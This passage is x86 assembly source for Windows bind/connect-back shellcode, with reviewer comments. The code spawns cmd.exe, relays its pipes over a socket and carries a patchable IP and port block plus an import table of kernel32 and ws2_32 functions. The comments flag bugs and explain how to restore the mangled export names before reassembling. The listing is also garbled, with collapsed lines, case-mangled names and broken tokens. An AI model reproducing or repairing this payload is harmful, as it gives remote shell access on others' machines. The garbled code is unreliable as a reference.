_Create_Process_to_Handle; Add ESP, 0CH; // Accept the data of the tubing, write into the PIPE, read the PIPE, and send it to the socket. 
; NOTE(review): the outcome of _Create_Process_To_Handle is never checked before the pump is
; entered, and if the socket was created but the pipes failed, the socket is not closed before
; Main_Quit_Now (moot: ExitProcess follows).  hProcess/hThread from ProcessInformation are never
; closed; TerminateProcess is issued on hProcess regardless of whether CreateProcessA succeeded.
// _ Recv_Write_Socket_Pipe (SkOverflowFuncAddr * pFuncAddr, Shell_Cmd_Pipe * pCmdPipe); push edi; push esi; call _Recv_Write_Socket_Pipe; add esp, 8;; // Close the socket is no longer used; // _ Close_All_Communication_Pipe (SkOverflowFuncAddr * pFuncAddr, Shell_Cmd_Pipe * pCmdPipe) ; push edi; push esi; call _Close_All_Communication_Pipe add esp, 8;; // Close the process xor eax, eax; push eax; lea edx, [edi Shell_Cmd_Pipe.ProcessInformation]; mov eax, [edx PROCESS_INFORMATION.hProcess]; push eax; mov eax, [esi SkOverflowFuncAddr.TerminateProcess]; call eax; Main_Quit_Now:; // now available ..; // exit now xor eax, eax; push eax; mov eax, [esi SkOverflowFuncAddr.ExitProcess];. Call EAX; RET ;; // qit_return:; // Restore Stack MOV ESP, EBP; POP EBP; NOP; NOP ;;
; Embedded data block.  MyDataOffset is the distance from Call_back_data_Offset (the return
; address RUN_ACTUAL reads) to here.  MyConnectInfo holds the connect type, ports and IP words;
; the *Offset EQUs export each field's position relative to `start` so the sending side can
; patch them before delivery (stDataSetOffset / _GetDataSetOffset_Value further down are that
; export).  The IP/port initialisers are in the widened form that _convert_Sk_Long_To_Ansi_Word
; (above) undoes at run time -- presumably, again, to avoid NUL bytes; the definition of
; stConnectInfo itself is not shown in this chunk.
; NOTE(review): `szShellNeedFunc db 'cmd.exe ' db ' DB ' DB ' '` is where the command line and
; its separator/padding bytes were; the reprint has emptied the quoted literals (presumably '+').
/ / The following is data: MyDataOffset EQU $ -Call_back_data_ Offset; // call the function, the distance to where .ConnectTypeOffset equ $ -start; ListenPortOffset equ ConnectTypeOffset stConnectInfo.dwListenPort; ConnectIP1Offset equ ConnectTypeOffset stConnectInfo.dwIP1; ConnectIP2Offset equ ConnectTypeOffset stConnectInfo.dwIP2; ConnectPortOffset equ ConnectTypeOffset stConnectInfo.dwConnectPort; MyConnectInfo stConnectInfo <2, 0ffh, 0ffffh, 02010151h, 01250201h, 01a801c0h, 02010158h> String_Of_Data_Offset equ $ -MyConnectInfo; ExecCommandOffset equ $ -start; szShellNeedFunc db 'cmd.exe ' db ' DB ' DB ' '; // below is the function information. 
; Import-name table consumed by _Get_Overflow_Addr_From_Shell_Func.  Layout as reprinted:
;   DB <number of DLLs>                         (02H)
;   DB <len>, '<dll name>', '+'   DB <number of exports in this DLL>
;   DB <len>, '<export name>', '+'  ...         (0EH = 14 kernel32 names, 0BH = 11 ws2_32 names)
;   ... then GetModuleHandleA_Addr / GetProcAddressA_Addr as two DWORDs.
; NOTE(review): the separators print as `' '`; judging by _Convert_Add_Sign_To_Null_Sign they
; were '+' and are turned into NUL terminators at run time.
; NOTE(review): GetProcAddress is case-sensitive.  The export names here have been case-mangled
; by the reprint (`Socket`, `Bind`, `Listen`, `CloseSocket`, `getHostName`, `getStartupinfoa`,
; `EXITPROCESS`, ...) and at least one is misspelled: `GLOBALLOC` is 9 characters under a 0CH
; prefix that fits GlobalAlloc.  Restore the exact export names before reassembling.
; NOTE(review): most <len> prefixes equal strlen+1 (TerminateProcess 16 -> 11H, CreatePipe
; 10 -> 0BH, ...), but as printed Kernel32.dll (0EH), WriteFile (0BH) and GetLastError (0EH)
; do not fit that rule.  Check them against the original; a wrong length would desynchronise
; whatever walks this table.
; NOTE(review): GetStartupInfoA, GlobalAlloc and Sleep are resolved but not referenced by the
; code visible in this listing.
; NOTE(review): GetModuleHandleA_Addr / GetProcAddressA_Addr are absolute addresses (77e756dbh,
; 77e7564bh) that are valid only for one particular kernel32.dll build.  stDataSetOffset's
; dwGetModuleHandle / dwGetProcAddress fields export their positions, presumably so the sender
; can patch them per target; there is no PEB-walk fallback, so a wrong pair crashes the host.
SHELL_NEED_FUNC_BODY_OFFSET EQU $ -szshellneedFunc; // This is the shell function and DLL offset DB 02HDB 0EH,' Kernel32.dll ',' 'DB 0EHDB 11H,' TerminateProcess ',' 'DB 0BH,' CreatePipe ',' 'DB 10h,' getStartupinfoa ',' 'DB 0FH,' CreateProcessa ',' 'DB 0EH,' PEEKNAMEDPIPE ',' 'DB 0CH,' GLOBALLOC ',' 'DB 0BH,' Writefile ',' 'DB 09H,' Readfile ',' 'DB 06H,' Sleep ',' 'DB 0CH,' EXITPROCESS ',' 'DB 0EH,' GetLastError ',' 'DB 10H,' DuplicateHandle ',' 'DB 12H,' getCurrentProcess ',' 'DB 0ch,' CloseHandle ',' 'DB 0BH,' WS2_32.dll ',' 'DB 0BHDB 07H,' Socket ',' 'DB 05H,' Bind ',' 'DB 07H,' Listen ',' 'DB 07H,' Accept ',' 'DB 05H,' Send ',' 'DB 05H,' Recv ',' 'Db 0bh,' setsockopt ',' 'DB 0BH,' WSAStartup ',' 'DB 0ch,' CloseSocket ',' 'DB 08H,' Connect ',' 'DB 0ch,' getHostName ',' 'DB' _ getModuleHandle_addr_offset Equ $ - szShellNeedFuncGetModuleHandleOffset equ $ -start; GetModuleHandleA_Addr dd 77e756dbhGetProcAddressOffset equ $ -start; GetProcAddressA_Addr dd 77e7564bh_size_szShellNeedFunc equ $ -szShellNeedFunc 1_size_AllData equ $ -MyConnectInfo 1_sk_Bind_ConnectShellCode endpdb '------------------- ------------------------------------ '; // Offset in the code in the code
; stDataSetOffset: offsets (relative to `start`) of every patchable field of the payload --
; connect type, listen port, the two IP words, connect port, the command line and its size, and
; the two hard-coded resolver addresses.  _GetDataSetOffset_Value fills one of these in for the
; sending side; that proc continues past the end of this chunk.
stDataSetOffset struct dwConnectType DD 0; dwListenPort DD 0; dwConnectIP1 DD 0; dwConnectIP2 DD 0; dwConnectPort DD 0; dwExecCommand DD 0; wSizeExecCommand DW 0; wReserv1 DW 0 dwGetModuleHandle DD 0; dwGetProcAddress DD 0; stDataSetOffset ends_GetDataSetOffset_Value proc push ebp; mov ebp, esp; push esi; push edi; push edx; push ecx; push ebx; push eax; mov esi, FUNC_PARAM_1; lea edi, [esi stDataSetOffset.dwConnectType]; mov eax, ConnectTypeOffset; mov [edi], eax; lea edi , [ESI StDataSetOffset.dwlistenport]; MOV Eax, Listenp ortOffset; mov [edi], eax; lea edi, [esi stDataSetOffset.dwConnectIP1]; mov eax, ConnectIP1Offset; mov [edi], eax; lea edi, [esi stDataSetOffset.dwConnectIP2]; mov eax, ConnectIP2Offset; mov [ edi], eax; lea edi, [esi stDataSetOffset.dwConnectPort]; mov eax, 
ConnectPortOffset; mov [edi], eax; lea edi, [esi stDataSetOffset.dwExecCommand]; mov eax, ExecCommandOffset; mov [edi], eax Lea EDI, [ESI stdatasetoffset.wsizeexeccommand]; MOV AX, Shell_Need_Func_Body_offset; MOV [EDI], Eax; Lea EDI, [ESI stdatasetoffset.dwgetModuleHandle];